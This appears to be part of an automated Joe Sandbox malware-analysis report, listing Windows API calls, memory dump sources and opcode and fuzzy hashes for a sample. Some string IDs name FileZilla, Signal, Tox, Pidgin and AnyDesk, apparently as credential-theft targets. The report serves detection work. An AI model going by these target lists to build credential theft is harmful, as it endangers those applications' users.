                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$LocaleMessageSendTextThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1680304473-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E2E2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: filezillasignal::
                                                                                                                                              • API String ID: 1910495013-924609054
                                                                                                                                              • Opcode ID: 081cf9d4344114abee22fbb40e3976e7690c30e5a984096dd04f5371cc6f405d
                                                                                                                                              • Instruction ID: d5c2c167d72a189e882d0cca3a86e9c99cab8a4f6d60a4ad0f8bff490184d42b
                                                                                                                                              • Opcode Fuzzy Hash: 081cf9d4344114abee22fbb40e3976e7690c30e5a984096dd04f5371cc6f405d
                                                                                                                                              • Instruction Fuzzy Hash: 24513470A08381CFD730DF14E584B9ABBE1BB89318F10895DE98997251EB319949CF8B
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E36F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: signaltox::
                                                                                                                                              • API String ID: 1910495013-1483858761
                                                                                                                                              • Opcode ID: 86607321dfc89ee1129501f962dd4398c02e58c34e787d5435b7abe0913e6b76
                                                                                                                                              • Instruction ID: 2d16c31392efc8d9918af7630d3ab555db26cdb423ec37a8ec001890fe34c5be
                                                                                                                                              • Opcode Fuzzy Hash: 86607321dfc89ee1129501f962dd4398c02e58c34e787d5435b7abe0913e6b76
                                                                                                                                              • Instruction Fuzzy Hash: A9513570A08381CFD734DF14E584B9BBBE1BF89314F10895DE98997251EB31A949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E3FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: toxpidgin::
                                                                                                                                              • API String ID: 1910495013-2736818546
                                                                                                                                              • Opcode ID: f2ebfac7d6fb111fec3e17beeea44703572aea3f03f6adb6211b2d6db72359e6
                                                                                                                                              • Instruction ID: b4a68451eec8a5e269cc977eee6ab77c4f0ab89a2cd931055dde9933c6a03d7a
                                                                                                                                              • Opcode Fuzzy Hash: f2ebfac7d6fb111fec3e17beeea44703572aea3f03f6adb6211b2d6db72359e6
                                                                                                                                              • Instruction Fuzzy Hash: 7F512570A08381CFD731DF14E584B9ABBE1BF89318F10895DE98997251EB319949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E255
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: anydeskfilezilla::
                                                                                                                                              • API String ID: 1910495013-2519904345
                                                                                                                                              • Opcode ID: 0e79be94f39eb7406b9fb8a6747cae6b709778c79e1f9426f591edcce7612fbd
                                                                                                                                              • Instruction ID: 971ce2e769cad35b07e5199813dff823eef8caa4d212278d4a6cb579302ef559
                                                                                                                                              • Opcode Fuzzy Hash: 0e79be94f39eb7406b9fb8a6747cae6b709778c79e1f9426f591edcce7612fbd
                                                                                                                                              • Instruction Fuzzy Hash: 22513570A08381CFD730DF14E584B9ABBE1BF89314F10895DE98997251EB31A949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 00428003
                                                                                                                                              • GetFileTime.KERNEL32(?,?,?,?), ref: 00428025
                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 00428033
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0042805D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1499663573-0
                                                                                                                                              • Opcode ID: 8ed929e8840cf0571f25e06b926dfc94d164733cbe60adf04c0cc376b6f90c85
                                                                                                                                              • Instruction ID: 0f9157c03447155b879e481d300035be14b4a7e9415b58b015406b8be03fdab5
                                                                                                                                              • Opcode Fuzzy Hash: 8ed929e8840cf0571f25e06b926dfc94d164733cbe60adf04c0cc376b6f90c85
                                                                                                                                              • Instruction Fuzzy Hash: C0415E75600614AFC724DF64E880CABB7F4FF083103508A2EE1A693691EB34F949CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: d9906cbb21440189adeb46f65e4d7491ee8ad9fd862cf020c2635eacfbbe87dd
                                                                                                                                              • Instruction ID: 33bf42000e96db952560971249c255832eb346404390c0d155027bceb8e5320a
                                                                                                                                              • Opcode Fuzzy Hash: d9906cbb21440189adeb46f65e4d7491ee8ad9fd862cf020c2635eacfbbe87dd
                                                                                                                                              • Instruction Fuzzy Hash: FB313C71A11219FFDB10DFA5C884ADEBBB8FF08714F10812BFA15A6250D774A984CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041E91D: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041E937
                                                                                                                                                • Part of subcall function 0041E91D: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041E948
                                                                                                                                                • Part of subcall function 0041E91D: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0041E98E
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000064,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C13
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,004151C7,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C30
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,004151C7,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420CA6
                                                                                                                                              • CompareStringW.KERNEL32(?,?,00000064,00000000,?,00000000,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000), ref: 00420CBC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1997773198-0
                                                                                                                                              • Opcode ID: b5c51588650a37d4d1cb3d5db00bbc7826fd7714118cecf2b9c72995b1b9842b
                                                                                                                                              • Instruction ID: 03b7f2b66f2d75cf62d1d1e7f9f5aea8b6d3942825eff640f69c1656141198f9
                                                                                                                                              • Opcode Fuzzy Hash: b5c51588650a37d4d1cb3d5db00bbc7826fd7714118cecf2b9c72995b1b9842b
                                                                                                                                              • Instruction Fuzzy Hash: C431BC72900218EBCF25DF91DD45BDEBBB5FF08714FA0021AF814A62A1C7399992DB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00426B1D
                                                                                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00426B60
                                                                                                                                              • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00426B95
                                                                                                                                              • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00426BB9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: d1cd1edd8aebf657208b84a0c5c289419f7b47b2a8eecfcaa9bf4f1bc9fb4320
                                                                                                                                              • Instruction ID: 3f5e675f55d4a702bf8c1dec3373815d05f2456b451231204fc43b2a1b7b8f7a
                                                                                                                                              • Opcode Fuzzy Hash: d1cd1edd8aebf657208b84a0c5c289419f7b47b2a8eecfcaa9bf4f1bc9fb4320
                                                                                                                                              • Instruction Fuzzy Hash: D0215331740239EBCA219E06ECC0F277F6DEB45744F97446BF941A7351CA26BC40D6A9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00443500,00000000,00000001,?), ref: 0042A130
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0042A150
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A194
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0042A1AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$OpenQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1607946009-0
                                                                                                                                              • Opcode ID: e01145a01794671db8f5410ae6055daedd9c25c5f260b156cd7b5aa0a6d2c763
                                                                                                                                              • Instruction ID: dc5cdb4f54a3a496b110042336def724de51f15833206d37b3068f0c10fa97b6
                                                                                                                                              • Opcode Fuzzy Hash: e01145a01794671db8f5410ae6055daedd9c25c5f260b156cd7b5aa0a6d2c763
                                                                                                                                              • Instruction Fuzzy Hash: 07215C71E00214EFDB21CF95EC44ABEFBB8EF50314F9040AAE905A6211D3745A25DF6A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0042A5A3
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0042A60B
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042A62D
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A638
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteEnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4142876296-0
                                                                                                                                              • Opcode ID: 030e9521213b5cec4a943126c4209cfb504d0090493e7cce31642c1ea77828a9
                                                                                                                                              • Instruction ID: 74490a7ce1c544a02dbf4f80efdb720ef59ca58dfc40bea8b14ed366bb9d3a97
                                                                                                                                              • Opcode Fuzzy Hash: 030e9521213b5cec4a943126c4209cfb504d0090493e7cce31642c1ea77828a9
                                                                                                                                              • Instruction Fuzzy Hash: CA216B72E0012AAFCB21DB94D851BEEB7B4EF08314F444176FD11A72A0CB389E568B95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3253174383-0
                                                                                                                                              • Opcode ID: 5c80eacd3d21a3520f2eedc2b141da2997b8ba1f6184b55e1f1dc4efe2ab2cb9
                                                                                                                                              • Instruction ID: 92880c54d83cef890ef01a83bb49db2f2e97ba72a390528555b3e8eed935738a
                                                                                                                                              • Opcode Fuzzy Hash: 5c80eacd3d21a3520f2eedc2b141da2997b8ba1f6184b55e1f1dc4efe2ab2cb9
                                                                                                                                              • Instruction Fuzzy Hash: 9E118130300206BBCB24DF24DE88BE677A4BF01350F54442BFE85D6260D7B9D9A1CA18
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00422D40
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00422D48
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00422D5A
                                                                                                                                              • FreeResource.KERNEL32(00000000), ref: 00422DA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1078018258-0
                                                                                                                                              • Opcode ID: 0603fb92bcd478c8b805d9f6208dcb30c6965e4ad22ab062ac3084de4d362369
                                                                                                                                              • Instruction ID: 37e77f0d580c985eccbe4e444c991a434d904d033160aeb73e9ee784c397293c
                                                                                                                                              • Opcode Fuzzy Hash: 0603fb92bcd478c8b805d9f6208dcb30c6965e4ad22ab062ac3084de4d362369
                                                                                                                                              • Instruction Fuzzy Hash: 4E118279611722FFC7309F54EA48AABB774FF04755F80406AE80253750D7B8AD45C7A8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004272C1
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 004272C7
                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 004272CA
                                                                                                                                              • GetLastError.KERNEL32(?), ref: 004272E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3907606552-0
                                                                                                                                              • Opcode ID: 61c7e7d9b6b474a063e6b9c6d7eaf6789762496f64cb53e64a4fe5b19839d303
                                                                                                                                              • Instruction ID: 46fbf665e5fe45f0ecf4fbdd7c511345cd6b3779fbaa23856ba3fec1c6fd91d8
                                                                                                                                              • Opcode Fuzzy Hash: 61c7e7d9b6b474a063e6b9c6d7eaf6789762496f64cb53e64a4fe5b19839d303
                                                                                                                                              • Instruction Fuzzy Hash: 4101B131704210ABDB209BA5ED4AF1A7BA9EF84320F904566FA05CB281DA75DC01C774
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00425B0D
                                                                                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00425B2F
                                                                                                                                              • GetCapture.USER32 ref: 00425B41
                                                                                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00425B50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Capture
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1665607226-0
                                                                                                                                              • Opcode ID: 41ba8c012cf105ab7cfabcbff710673018262f8e0ce4aae3eb8d127922dae7ed
                                                                                                                                              • Instruction ID: 30d2a2513be581f839b2656ca0720de834e8737dd73f72248518bd740216b687
                                                                                                                                              • Opcode Fuzzy Hash: 41ba8c012cf105ab7cfabcbff710673018262f8e0ce4aae3eb8d127922dae7ed
                                                                                                                                              • Instruction Fuzzy Hash: 2F016D703407187FFA302B15ACC9FBB76ADDB88788F914039F341EA1D2C6A59C055A64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 004296C0
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 004296C9
                                                                                                                                              • wsprintfA.USER32 ref: 004296E5
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004296FB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1902064621-0
                                                                                                                                              • Opcode ID: 927a4f46756840b7d5d769d63706027d2597c3eeb89ddb1f9a2eacf531248ca7
                                                                                                                                              • Instruction ID: a5194eaa5d267bfce1f697c3276f513d5c4f67dce319ffc6cf3dff497de3ed65
                                                                                                                                              • Opcode Fuzzy Hash: 927a4f46756840b7d5d769d63706027d2597c3eeb89ddb1f9a2eacf531248ca7
                                                                                                                                              • Instruction Fuzzy Hash: D3018B32600219FBCB11DFA4ED05F9F7BB9BF48708F90403AFA11AA150DB75DA119B98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00424FCD
                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 0042500C
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0042502A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2353593579-0
                                                                                                                                              • Opcode ID: 6642e3dc04a849abbdc9febbdb983b15e036c38badf80aee8fee512f8d387543
                                                                                                                                              • Instruction ID: e8fda6cfe15639f69245f96e4c32ccf3e247865d1e166a8c34f89f462bfd62a7
                                                                                                                                              • Opcode Fuzzy Hash: 6642e3dc04a849abbdc9febbdb983b15e036c38badf80aee8fee512f8d387543
                                                                                                                                              • Instruction Fuzzy Hash: 4501003220152ABBCF226F91ED09E9F3B25EF89350F854025FE1055161D73AC932EBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00424A3C
                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 00424A4F
                                                                                                                                                • Part of subcall function 00424A31: GetWindow.USER32(00000000,00000002), ref: 00424A96
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00424A7F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 369458955-0
                                                                                                                                              • Opcode ID: b9f3f23133e0281108d4f9682040040fb4f1f4bc896dd1d0bc87f1e1c94142e9
                                                                                                                                              • Instruction ID: 24d9463ce005fff643b8f741c0515ee5154fda0862fcd9038226e8ac00ae5952
                                                                                                                                              • Opcode Fuzzy Hash: b9f3f23133e0281108d4f9682040040fb4f1f4bc896dd1d0bc87f1e1c94142e9
                                                                                                                                              • Instruction Fuzzy Hash: 37014432381536BB8F326B52AC04E9F3A69DFD53A4BD14036FE1055211E739C921969D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SysStringLen.OLEAUT32(?), ref: 0042B521
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042CE8B,00000000), ref: 0042B537
                                                                                                                                              • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042B53F
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042CE8B,00000000), ref: 0042B554
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3384502665-0
                                                                                                                                              • Opcode ID: ebc8b17013044a55624bf79895947c7aba81f2b12cff67d93ce8b63f0bf7c138
                                                                                                                                              • Instruction ID: 753ad0f5e46b68682b0d373a57b70d68207eba0a8fe5c42bdb6e2b9dfc4e7a6e
                                                                                                                                              • Opcode Fuzzy Hash: ebc8b17013044a55624bf79895947c7aba81f2b12cff67d93ce8b63f0bf7c138
                                                                                                                                              • Instruction Fuzzy Hash: 11F0B471207234BF92209B669C48CABBFACFE8B3A4B50453AF544C2100C3755801CBF9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • IntersectRect.USER32(?,00000000,?), ref: 0041114B
                                                                                                                                              • EqualRect.USER32(?,00000000), ref: 00411158
                                                                                                                                              • IsRectEmpty.USER32(?), ref: 00411162
                                                                                                                                              • InvalidateRect.USER32(?,?,?), ref: 0041117F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$EmptyEqualIntersectInvalidate
